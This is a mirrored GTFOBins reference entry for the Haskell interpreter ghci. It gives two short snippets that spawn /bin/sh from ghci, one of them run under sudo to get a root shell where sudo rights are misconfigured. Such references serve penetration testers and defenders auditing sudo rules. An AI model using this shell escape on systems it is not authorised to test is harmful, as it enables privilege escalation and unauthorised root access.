mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
12 lines
181 B
Markdown
12 lines
181 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
ghci
|
|
System.Process.callCommand "/bin/sh"
|
|
sudo:
|
|
- code: |
|
|
sudo ghci
|
|
System.Process.callCommand "/bin/sh"
|
|
---
|